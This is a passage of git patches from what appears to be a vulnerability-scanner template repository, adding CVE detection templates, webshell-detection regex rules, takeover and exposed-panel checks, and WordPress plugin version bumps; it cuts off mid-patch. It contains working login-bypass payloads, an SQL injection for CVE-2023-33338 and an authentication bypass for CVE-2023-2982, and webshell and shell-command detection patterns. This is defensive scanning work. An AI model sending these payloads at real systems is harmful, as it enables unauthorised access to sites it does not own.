https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0 + - https://nvd.nist.gov/vuln/detail/CVE-2023-33338 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-33338 + cwe-id: CWE-89 + metadata: + verified: true + tags: cve,cve2023,oahms,sql,unauthenticated,critical +http: + - raw: + - | + POST /oahms/admin/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=vaday%27+or+1%3D1%23&password=password&submit= + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "Admin")' + - 'contains(body, "Old Age Home Management System|| Dashboard")' + condition: and From ced01f1ac81bd3f31fb4fff6254929112c6c8999 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Jun 2023 12:59:33 +0530 Subject: [PATCH 187/609] added reference and fix matcher --- file/webshell/{asp.yaml => asp-webshell.yaml} | 18 ++++---- file/webshell/{jsp.yaml => jsp-webshell.yaml} | 17 ++++---- file/webshell/php-webshell.yaml | 33 +++++++++++++++ file/webshell/php.yaml | 41 ------------------- 4 files changed, 52 insertions(+), 57 deletions(-) rename file/webshell/{asp.yaml => asp-webshell.yaml} (54%) rename file/webshell/{jsp.yaml => jsp-webshell.yaml} (51%) create mode 100644 file/webshell/php-webshell.yaml delete mode 100644 file/webshell/php.yaml diff --git a/file/webshell/asp.yaml b/file/webshell/asp-webshell.yaml similarity index 54% rename from file/webshell/asp.yaml rename to file/webshell/asp-webshell.yaml index 785a811e66..cef1e2c90c 100644 --- a/file/webshell/asp.yaml +++ b/file/webshell/asp-webshell.yaml @@ -1,12 +1,16 @@ -id: asp-webshell-scanner +id: asp-webshell info: - name: ASP/ASP.NET Webshell Scanner + name: ASP/ASP.NET Webshell - Detect author: lu4nx severity: high reference: - - https://github.com/tennc/webshell - tags: asp,asp.net,file + - https://github.com/tennc/webshell/tree/master/aspx + - https://github.com/tennc/webshell/tree/master/asp + - https://www.rapid7.com/blog/post/2016/12/14/webshells-101/ + metadata: + verified: true + tags: asp,aspx,file,webshell file: - extensions: @@ -20,14 +24,10 @@ file: extractors: - type: regex regex: - # <%eval request("xx")%> - '(?i)(eval)' - '(?i)(eval|execute)\(' - '(?i)wscript.shell' - '(?i)ExecuteStatement' - '(?i)cmd.exe' - - type: regex - regex: - # mmshell = 'xxx' - '(?i)mmshell' - - '(?i)GetCmd' + - '(?i)GetCmd' \ No newline at end of file diff --git a/file/webshell/jsp.yaml b/file/webshell/jsp-webshell.yaml similarity index 51% rename from file/webshell/jsp.yaml rename to file/webshell/jsp-webshell.yaml index 603a3964e4..3396019601 100644 --- a/file/webshell/jsp.yaml +++ b/file/webshell/jsp-webshell.yaml @@ -1,17 +1,22 @@ -id: jsp-webshell-scanner +id: jsp-webshell info: - name: JSP Webshell Scanner + name: JSP Webshell - Detect author: lu4nx severity: high reference: - - https://github.com/tennc/webshell - tags: jsp,file + - https://github.com/tennc/webshell/tree/master/jsp + - https://github.com/tennc/webshell/tree/master/jspx + - https://www.rapid7.com/blog/post/2016/12/14/webshells-101/ + metadata: + verified: true + tags: jsp,java,jspx,webshell,file file: - extensions: - jsp - java + - jspx extractors: - type: regex @@ -20,6 +25,4 @@ file: - '(?i)cmd.exe' - '(?i)/bin/sh' - '(?i)/bin/bash' - - type: regex - regex: - - '(?i)exeCmd' + - '(?i)exeCmd' \ No newline at end of file diff --git a/file/webshell/php-webshell.yaml b/file/webshell/php-webshell.yaml new file mode 100644 index 0000000000..747b8a97bd --- /dev/null +++ b/file/webshell/php-webshell.yaml @@ -0,0 +1,33 @@ +id: php-webshell + +info: + name: PHP Webshell - Detect + author: lu4nx + severity: high + reference: + - https://github.com/tennc/webshell/tree/master/php + - https://www.rapid7.com/blog/post/2016/12/14/webshells-101/ + metadata: + verified: true + tags: php,file,webshell + +file: + - extensions: + - php + + extractors: + - type: regex + regex: + - '(?i)\b(passthru|eval|exec|system|phpinfo|assert|call_user_func|call_user_func_array)\(' + - '(?i)cmd.exe' + - '(?i)/bin/sh' + - '(?i)/bin/bash' + - '(?i)WScript.Shell' + - '(?i)gzuncompress\(base64_decode\(' + - '\]\(\$_(GET|POST|COOKIE|REQUEST)\[' + - '(?i)new\s*(ReflectionFunction|ReflectionClass)' + - '(?i)0x647261646e617473' + - '65786563' # exec + - '(?i)\$\w+\(\$_(GET|POST|COOKIE|REQUEST)' + - '(?i)b4tm4n' + - '(?i)cmdshell' \ No newline at end of file diff --git a/file/webshell/php.yaml b/file/webshell/php.yaml deleted file mode 100644 index d2a91bf46c..0000000000 --- a/file/webshell/php.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: php-webshell-scanner - -info: - name: PHP Webshell Scanner - author: lu4nx - severity: high - reference: - - https://github.com/tennc/webshell - tags: php,file - -file: - - extensions: - - php - - extractors: - - type: regex - regex: - - '(?i)\b(passthru|eval|exec|system|phpinfo|assert|call_user_func|call_user_func_array)\(' - - '(?i)cmd.exe' - - '(?i)/bin/sh' - - '(?i)/bin/bash' - - '(?i)WScript.Shell' - - type: regex - regex: - - '(?i)gzuncompress\(base64_decode\(' - # Example: $array[0]['tt']($_POST['tt1234']); - - '\]\(\$_(GET|POST|COOKIE|REQUEST)\[' - # Example: - # $f = new class($_POST['name']) extends ReflectionFunction {}; - # $f->invoke($_POST[xxx]); - - '(?i)new\s*(ReflectionFunction|ReflectionClass)' - # Reference: https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php - - '(?i)0x647261646e617473' - # Reference: https://github.com/upsi1on/webshell/blob/main/upsi1on/upsi1on.php#L1173 - - '65786563' # exec - # Example: - # $a = substr('1a',1).'s'.'s'.'e'.'r'.'t'; - # $a($_POST['x']); - - '(?i)\$\w+\(\$_(GET|POST|COOKIE|REQUEST)' - - '(?i)b4tm4n' - - '(?i)cmdshell' From f7063e8530424fcdb4b6bdd7220253003ba34383 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= Date: Thu, 29 Jun 2023 09:37:54 +0200 Subject: [PATCH 188/609] Better bash-history matching --- http/misconfiguration/shell-history.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/http/misconfiguration/shell-history.yaml b/http/misconfiguration/shell-history.yaml index 9d07be82e9..70b21da387 100644 --- a/http/misconfiguration/shell-history.yaml +++ b/http/misconfiguration/shell-history.yaml @@ -31,7 +31,9 @@ http: - "sudo " - "cd " - "cp " - - "ps aux " + - "ps aux" + - "ls " + - "logout" condition: or - type: word From 99da545f35c915aac1b775cfbdaf42fb0780014d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Jun 2023 13:32:24 +0530 Subject: [PATCH 189/609] fix matcher --- http/takeovers/webflow-takeover.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/http/takeovers/webflow-takeover.yaml b/http/takeovers/webflow-takeover.yaml index 4bb447388c..6e03ea51bf 100644 --- a/http/takeovers/webflow-takeover.yaml +++ b/http/takeovers/webflow-takeover.yaml @@ -2,7 +2,7 @@ id: webflow-takeover info: name: webflow takeover detection - author: pdteam, keni0k + author: pdteam,keni0k severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz @@ -23,6 +23,7 @@ http: - type: word words: - -

The page you are looking doesn't exist or has been moved.

- - webflow - condition: and + - "The page you are looking for doesn't exist or has been moved." + - "The page you are looking for doesn't exist or has been moved" + -

The page you are looking for doesn't exist or has been moved.

+ condition: or From ff617e70b56bb0553411a09ec2cf9e79c58d051b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Jun 2023 13:37:09 +0530 Subject: [PATCH 190/609] fix empty lines --- http/takeovers/webflow-takeover.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/takeovers/webflow-takeover.yaml b/http/takeovers/webflow-takeover.yaml index b83b10171a..fb610dc8b3 100644 --- a/http/takeovers/webflow-takeover.yaml +++ b/http/takeovers/webflow-takeover.yaml @@ -28,4 +28,3 @@ http: - "The page you are looking for doesn't exist or has been moved" -

The page you are looking for doesn't exist or has been moved.

condition: or - From f8185c0c637919ad17d9b36318860c26a9ef9a8f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Jun 2023 14:12:32 +0530 Subject: [PATCH 191/609] Create codeigniter-errorpage.yaml --- .../codeigniter-errorpage.yaml | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/misconfiguration/codeigniter-errorpage.yaml diff --git a/http/misconfiguration/codeigniter-errorpage.yaml b/http/misconfiguration/codeigniter-errorpage.yaml new file mode 100644 index 0000000000..c313b12f20 --- /dev/null +++ b/http/misconfiguration/codeigniter-errorpage.yaml @@ -0,0 +1,39 @@ +id: codeigniter-errorpage + +info: + name: CodeIgniter - Error Page + author: j4vaovo + severity: low + metadata: + verified: true + max-request: 1 + fofa-query: title="ErrorException" + shodan-query: title:"Error" html:"CodeIgniter" + tags: codeigniter,misconfig,error + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Error" + - "ErrorException" + - "Database Error" + condition: or + + - type: word + part: body + words: + - "CodeIgniter" + case-insensitive: true + + - type: status + status: + - 200 + - 500 + condition: or From 7cabdedff5854bd3842b12507019c9f244308287 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Jun 2023 14:38:44 +0530 Subject: [PATCH 192/609] HunterMapping Trending Panels --- http/exposed-panels/arcserve-panel.yaml | 31 +++++++++++++++++++++++ http/exposed-panels/cloudpanel-login.yaml | 30 ++++++++++++++++++++++ 2 files changed, 61 insertions(+) create mode 100644 http/exposed-panels/arcserve-panel.yaml create mode 100644 http/exposed-panels/cloudpanel-login.yaml diff --git a/http/exposed-panels/arcserve-panel.yaml b/http/exposed-panels/arcserve-panel.yaml new file mode 100644 index 0000000000..09028c356d --- /dev/null +++ b/http/exposed-panels/arcserve-panel.yaml @@ -0,0 +1,31 @@ +id: arcserve-panel + +info: + name: ArcServe - Panel + author: DhiyaneshDk + severity: info + reference: + - https://twitter.com/HunterMapping/status/1674267368359444480 + - https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe + metadata: + verified: true + max-request: 1 + fofa-query: icon_hash="-1889244460" + shodan-query: http.favicon.hash:-1889244460 + tags: panel,login,arcserve + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Arcserve UDP Agent" + + - type: status + status: + - 200 diff --git a/http/exposed-panels/cloudpanel-login.yaml b/http/exposed-panels/cloudpanel-login.yaml new file mode 100644 index 0000000000..b73c1af9a8 --- /dev/null +++ b/http/exposed-panels/cloudpanel-login.yaml @@ -0,0 +1,30 @@ +id: cloudpanel-login + +info: + name: CloudPanel - Login + author: DhiyaneshDk + severity: info + metadata: + verified: true + max-request: 1 + fofa-query: icon_hash="151132309" + shodan-query: http.favicon.hash:151132309 + tags: panel,login,cloudpanel + +http: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "CloudPanel | Log In" + - "Forgot password" + condition: and + + - type: status + status: + - 200 From 955d244f99221ad83df032a227333dd967bebbbb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 29 Jun 2023 18:28:22 +0530 Subject: [PATCH 193/609] Create CVE-2023-2982.yaml --- http/cves/2023/CVE-2023-2982.yaml | 41 +++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 http/cves/2023/CVE-2023-2982.yaml diff --git a/http/cves/2023/CVE-2023-2982.yaml b/http/cves/2023/CVE-2023-2982.yaml new file mode 100644 index 0000000000..526f7548a6 --- /dev/null +++ b/http/cves/2023/CVE-2023-2982.yaml @@ -0,0 +1,41 @@ +id: CVE-2023-2982 + +info: + name: Miniorange Social Login and Register <= 7.6.3 - Authentication Bypass + author: ritikchaddha + severity: critical + description: | + The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5. + remediation: Fixed in version 7.6.5 + reference: | + - https://lana.codes/lanavdb/2326f41f-a39f-4fde-8627-9d29fff91443/ + - https://wordpress.org/plugins/miniorange-login-openid/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-2982 + classification: + cve-id: CVE-2023-2982 + metadata: + max-request: 1 + verified: true + tags: cve,cve2023,wp,wordpress,wp-plugin,auth-bypass,miniorange + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + option=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D + + matchers-condition: and + matchers: + - type: word + part: set_cookie + words: + - "wordpress_sec_" + - "wordpress_logged_in_" + condition: or + + - type: status + status: + - 302 From 1d52fa576b06d45ee8bf4f57ece4a1ca8a819717 Mon Sep 17 00:00:00 2001 From: Brandon Hutchinson Date: Thu, 29 Jun 2023 18:25:35 +0000 Subject: [PATCH 194/609] Update aws-bucket-takeover.yaml --- http/takeovers/aws-bucket-takeover.yaml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/http/takeovers/aws-bucket-takeover.yaml b/http/takeovers/aws-bucket-takeover.yaml index 41fafe0650..38d548e234 100644 --- a/http/takeovers/aws-bucket-takeover.yaml +++ b/http/takeovers/aws-bucket-takeover.yaml @@ -35,3 +35,11 @@ http: words: - "amazonaws.com" negative: true + + extractors: + - type: regex + part: body + group: 1 + regex: + - '
  • BucketName: (.*?)
  • ' + - '(.*?)' From e27f4d4e16b3e98719d77485bb3a3bf9be6c7d0b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 30 Jun 2023 04:02:16 +0000 Subject: [PATCH 195/609] Auto WordPress Plugins Update [Fri Jun 30 04:02:16 UTC 2023] :robot: --- helpers/wordpress/plugins/code-snippets.txt | 2 +- helpers/wordpress/plugins/cookie-law-info.txt | 2 +- helpers/wordpress/plugins/custom-fonts.txt | 2 +- helpers/wordpress/plugins/ewww-image-optimizer.txt | 2 +- helpers/wordpress/plugins/fluentform.txt | 2 +- .../wordpress/plugins/google-analytics-dashboard-for-wp.txt | 2 +- helpers/wordpress/plugins/google-analytics-for-wordpress.txt | 2 +- helpers/wordpress/plugins/newsletter.txt | 2 +- helpers/wordpress/plugins/redux-framework.txt | 2 +- helpers/wordpress/plugins/woocommerce-payments.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cloudflare.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 3 +-- http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - http/technologies/wordpress/plugins/easy-google-fonts.yaml | 1 - .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-and-footer-scripts.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - http/technologies/wordpress/plugins/photo-gallery.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 210 files changed, 11 insertions(+), 211 deletions(-) diff --git a/helpers/wordpress/plugins/code-snippets.txt b/helpers/wordpress/plugins/code-snippets.txt index fbcbf73806..8cf6caf561 100644 --- a/helpers/wordpress/plugins/code-snippets.txt +++ b/helpers/wordpress/plugins/code-snippets.txt @@ -1 +1 @@ -3.4.0 \ No newline at end of file +3.4.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/cookie-law-info.txt b/helpers/wordpress/plugins/cookie-law-info.txt index a0cd9f0ccb..50e47c89ca 100644 --- a/helpers/wordpress/plugins/cookie-law-info.txt +++ b/helpers/wordpress/plugins/cookie-law-info.txt @@ -1 +1 @@ -3.1.0 \ No newline at end of file +3.1.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/custom-fonts.txt b/helpers/wordpress/plugins/custom-fonts.txt index 359a5b952d..10bf840ed5 100644 --- a/helpers/wordpress/plugins/custom-fonts.txt +++ b/helpers/wordpress/plugins/custom-fonts.txt @@ -1 +1 @@ -2.0.0 \ No newline at end of file +2.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ewww-image-optimizer.txt b/helpers/wordpress/plugins/ewww-image-optimizer.txt index 2f963cd6d1..3769235d3e 100644 --- a/helpers/wordpress/plugins/ewww-image-optimizer.txt +++ b/helpers/wordpress/plugins/ewww-image-optimizer.txt @@ -1 +1 @@ -7.0.2 \ No newline at end of file +7.1.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/fluentform.txt b/helpers/wordpress/plugins/fluentform.txt index 553fe87a05..4d5e5283b9 100644 --- a/helpers/wordpress/plugins/fluentform.txt +++ b/helpers/wordpress/plugins/fluentform.txt @@ -1 +1 @@ -5.0.4 \ No newline at end of file +5.0.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt b/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt index fcae8588f7..261655b0c9 100644 --- a/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt +++ b/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt @@ -1 +1 @@ -7.16 \ No newline at end of file +7.17 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-analytics-for-wordpress.txt b/helpers/wordpress/plugins/google-analytics-for-wordpress.txt index b14fccecc2..19a7efe84f 100644 --- a/helpers/wordpress/plugins/google-analytics-for-wordpress.txt +++ b/helpers/wordpress/plugins/google-analytics-for-wordpress.txt @@ -1 +1 @@ -8.16 \ No newline at end of file +8.17 \ No newline at end of file diff --git a/helpers/wordpress/plugins/newsletter.txt b/helpers/wordpress/plugins/newsletter.txt index 